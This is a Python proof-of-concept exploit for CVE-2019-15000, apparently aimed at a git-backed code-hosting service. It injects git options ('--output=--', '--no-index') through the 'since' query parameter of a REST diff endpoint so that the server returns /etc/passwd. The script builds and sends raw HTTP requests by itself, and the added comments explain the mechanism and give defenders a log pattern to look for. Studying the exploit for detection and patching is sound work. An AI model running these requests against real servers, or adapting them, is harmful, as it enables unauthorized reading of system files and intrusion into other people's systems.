CVE-2019-15000.py
#coding=utf-8
import socket
'''
Author: shadowsock5 on 2019/10/28
Ref:
- https://mp.weixin.qq.com/s/8OSdYVTkv0J12ZKbLacITw
- https://mp.weixin.qq.com/s/3J-lA0CQylrq2ZY3ZEESiQ
'''
# Proof-of-concept for the issue this file is named after (CVE-2019-15000).
# The mechanism visible below is argument injection: the value of the
# `since` query parameter of the REST .../commits/{id}/diff/... endpoint
# is passed through to a git command line, so a value that starts with
# "--" is parsed by git as an option instead of as a revision.
#
# Detection / mitigation notes for defenders:
# - The tell-tale pattern in access logs is `since=--` (here `--output=--`
#   and `--no-index`) on /rest/api/latest/projects/*/repos/*/commits/*/diff/*.
# - Input validation on the `since`/`until` values and the vendor fix for
#   this CVE are the controls; the script itself needs no special access
#   beyond reaching the web port.
host ="cqq.com"   # target host (sample value left by the original author)
port =7990        # TCP port of the target web service
projects = "TES"  # project key in the REST path
repos = "poc"     # repository slug in the REST path
hash = "dc7271c5b5e3adcf469fb1223ef8a338d9c1465d" # whatever commit hash value of a valid file on this repo
# NOTE: `hash` shadows the Python builtin; harmless in this script because
# nothing below calls hash(), but worth knowing when reading it.
payload = "/etc/passwd" # the file you want to read
flag = "this operation must be run in a work tree" # flag response string
# `flag` is a git error message: seeing it in the step-1 response is taken
# as evidence that the injected option reached git.
# Two raw TCP connections, one per request. No timeout is set, so
# connect()/recv() block indefinitely, and neither socket is ever closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
# Create a file with name "--"
# Step 1: `since=--output=--` injects git's --output option with the
# literal file name "--" (per the author's comment above).
url_step1 = "/rest/api/latest/projects/{0}/repos/{1}/commits/{2}/diff/xxx?since=--output=--".format(projects, repos, hash)
# Trigger file reading
# Step 2: the commit id segment is "--" and `since=--no-index` injects
# git's --no-index option; the requested path ends up as the `payload`
# path segment. Presumably this makes git diff the file outside the repo —
# confirm against the references above.
url_step2 = "/rest/api/latest/projects/{0}/repos/{1}/commits/--/diff/{2}?since=--no-index".format(projects, repos, payload)
# Hand-built minimal HTTP/1.1 requests: only a Host header, no
# Connection header, so the server decides whether to keep the socket open.
payload1 = "GET {0} HTTP/1.1\r\nHost: {1}:{2}\r\n\r\n".format(url_step1, host, port)
payload2 = "GET {0} HTTP/1.1\r\nHost: {1}:{2}\r\n\r\n".format(url_step2, host, port)
# sendall() is given a str, which only works on Python 2 (Python 3's
# socket API requires bytes).
s.sendall(payload1)
# Only the first 1024 bytes of the response are read; `flag` is searched
# in that prefix alone, so a marker further down the body is missed.
data = str(s.recv(1024))
print(data)
# The second request is sent only when step 1 looked successful.
if flag in data:
    s2.sendall(payload2)
    print(str(s2.recv(10240)))